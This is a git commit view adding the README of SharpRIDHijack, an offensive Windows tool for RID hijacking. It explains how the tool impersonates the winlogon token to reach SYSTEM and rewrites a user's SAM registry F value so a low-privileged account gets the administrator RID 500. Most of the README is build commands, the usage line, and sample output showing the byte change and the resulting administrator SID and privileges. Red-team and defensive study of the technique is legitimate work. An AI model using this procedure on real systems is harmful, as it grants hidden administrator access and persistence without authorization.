diff options
| author | heqnx <root@heqnx.com> | 2025-04-25 13:39:58 +0300 |
|---|---|---|
| committer | heqnx <root@heqnx.com> | 2025-04-25 13:39:58 +0300 |
| commit | 8257b544588a7a1d37698f2d2efb885967c8d313 (patch) | |
| tree | 836171f93719f85b50eebca441211693e0441557 /README.md | |
| parent | 47d070f274393a9ce87657d82dc8cbcb79dda5a8 (diff) | |
| download | SharpRIDHijack-8257b544588a7a1d37698f2d2efb885967c8d313.tar.gz SharpRIDHijack-8257b544588a7a1d37698f2d2efb885967c8d313.zip | |
initial commit
Diffstat (limited to 'README.md')
| -rw-r--r-- | README.md | 123 |
1 files changed, 123 insertions, 0 deletions
diff --git a/README.md b/README.md new file mode 100644 index 0000000..7c9042c --- /dev/null +++ b/README.md @@ -0,0 +1,123 @@ +# SharpRIDHijack + +`SharpRIDHijack` is an offensive security tool designed for performing RID (Relative Identifier) hijacking on Windows systems. It escalates privileges by impersonating the SYSTEM account and modifying the SAM registry to assign an administrative RID to a specified user account. The tool supports both command-line and installer-based execution. + +> **WARNING**: This tool is for **authorized security testing only**. Unauthorized use may violate laws and regulations. The author and contributors are not responsible for misuse. Always obtain explicit permission before testing any system. + +## Features + +- **Privilege Escalation**: Escalates to SYSTEM by impersonating the winlogon process token. +- **RID Hijacking**: Modifies the SAM registry to assign an administrative RID (default: 500) to a target user. + +## Installation + +### Prerequisites + +- **.NET Framework**: Version 4.7.2 or later. +- **Visual Studio or MSBuild**: For compiling the C# source code. +- **Git**: To clone the repository. +- **Windows**: Compatible with Windows 10/11 (other versions may require offset adjustments for SAM registry). + +### Steps + +- Clone the repository: + +``` +PS C:\> git clone https://github.com/heqnx/SharpRIDHijack.git +PS C:\> cd SharpRIDHijack +``` + +- Compile the source code with Visual Studio by opening `SharpRIDHijack.sln` + +- Alternatively, compile with MSBuild: + +``` +PS C:\> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe SharpRIDHijack.csproj +``` + +## Usage + +### Command-Line Flags + +- Run SharpRIDHijack.exe with a target username to perform RID hijacking. The tool requires administrative privileges. + +``` +PS C:\> Usage: SharpRIDHijack.exe <username> +``` + +## Examples + +### Perform RID Hijacking via Command-Line + +- Hijack the RID of the `lowpriv` user to grant administrative privileges: + +``` +PS C:\> SharpRIDHijack.exe lowpriv +[inf] SeDebugPrivilege enabled +[inf] Successfully impersonated WinLogon, running as NT AUTHORITY\SYSTEM +[inf] Original RID: 000003EB (1003) +[inf] Original F value: +03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 EB 03 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 +[inf] Found RID 1003 at offset 48 +[inf] New F value: +03 00 01 00 00 00 00 00 CB 5C 3B 54 CA B5 DB 01 00 00 00 00 00 00 00 00 F4 6D 86 48 CA B5 DB 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F4 01 00 00 01 02 00 00 10 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 +``` + +- Note the user is explicitly in the administrators group when checking with `net user`: + +``` +PS C:\> net user lowpriv +User name lowpriv + +... + +Local Group Memberships *Users +Global Group memberships *None +The command completed successfully. +``` + +- User does show up with an administrator SID and associated privileges: + +``` +PS C:\> whoami /user + +USER INFORMATION +---------------- + +User Name SID +======================= ============================================ +DESKTOP-C9VFZ4T\lowpriv S-1-5-21-1743776718-435079111-2757990620-500 + +PS C:\> whoami /priv + +PRIVILEGES INFORMATION +---------------------- + +Privilege Name Description State +========================================= ================================================================== ======== +... +SeRestorePrivilege Restore files and directories Disabled +SeDebugPrivilege Debug programs Enabled +SeSystemEnvironmentPrivilege Modify firmware environment values Disabled +SeChangeNotifyPrivilege Bypass traverse checking Enabled +... +SeImpersonatePrivilege Impersonate a client after authentication Enabled +SeCreateGlobalPrivilege Create global objects Enabled +SeIncreaseWorkingSetPrivilege Increase a process working set Disabled +... +``` + + +## Automated Releases + +Check the GitHub Releases page for the new release with attached binaries. + +## License + +This project is licensed under the GNU GENERAL PUBLIC LICENSE. See the LICENSE file for details. + +## Disclaimer + +`SharpRIDHijack` is provided "as is" without warranty. The author and contributors are not liable for any damages or legal consequences arising from its use. Use responsibly and only in authorized environments. + + |